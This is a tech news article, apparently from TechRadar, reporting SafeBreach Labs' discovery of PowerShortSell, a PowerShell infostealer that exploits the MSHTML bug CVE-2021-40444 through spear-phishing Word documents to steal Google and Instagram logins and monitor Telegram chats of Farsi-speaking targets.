This old Internet Explorer bug is being used to steal Google, Instagram logins

It also monitors Telegram chats, experts warn

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

A new infostealer is making rounds on the web, grabbingGoogleand Instagramcredentialsand monitoring the victims’ Telegram correspondence, cyber-researchers are saying.

As reported byBleeping Computer, security researchers from SafeBreach Labs have recently discovered a new Iranian threat actor, who’s been targeting the Farsi-speaking community all over the world with the new malware.

The malware is a PowerShell-based stealer called PowerShortSell. It exploits aMicrosoftMSHTML remote code execution (RCE) bug, tracked under the ticker CVE-2021-40444. To infect a device, the attacker first needs to execute aspear-phishing attack, sending a Microsoft Word attachment that can execute a DLL downloaded by running the malicious file.

Once the downloaded DLL launches PowerShortSell, the malware starts collecting data,stealing passwords, taking screenshots, and sending all of the data to the attacker’s command-and-control server.

Targeting enemies of the establishment

According to Tomer Bar, Director of Security Research at SafeBreach Labs, the targets seem to be “Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime”. Bar came to this conclusion after analyzing the contents of the Word document sent out in the phishing attack, in which Iran’s leaders are blamed for a “Corona massacre”.

“The adversary might be tied to Iran’s Islamic regime since the Telegram surveillance usage is typical of Iran’s threat actors like Infy, Ferocious Kitten, and Rampant Kitten,” he added.

Almost half of all of the victims (45.8%) live in the United States, with the remainder being in The Netherlands (12.5%), Russia, Germany, and Canada (8.3%).

Are you a pro? Subscribe to our newsletter

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

CVE-2021-40444 RCE bug, which impacts Internet Explorer’s MSTHML rendering engine, was patched mid-September this year. It was first spotted in the wild three weeks prior, as the Iranians were not the only group to abuse the discovered vulnerability.

In fact, threat actors were sharing tutorials and proof-of-concepts on hacking forums long before Microsoft managed to patch it up, Bleeping Computer finds.

You might also want to check out our list of thebest security keysout there

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

Phishing attacks surge in 2024 as cybercriminals adopt AI tools and multi-channel tactics

This new phishing strategy utilizes GitHub comments to distribute malware

Smeg Combi Steam Oven review: a multi-functional countertop oven that looks stunning and cooks well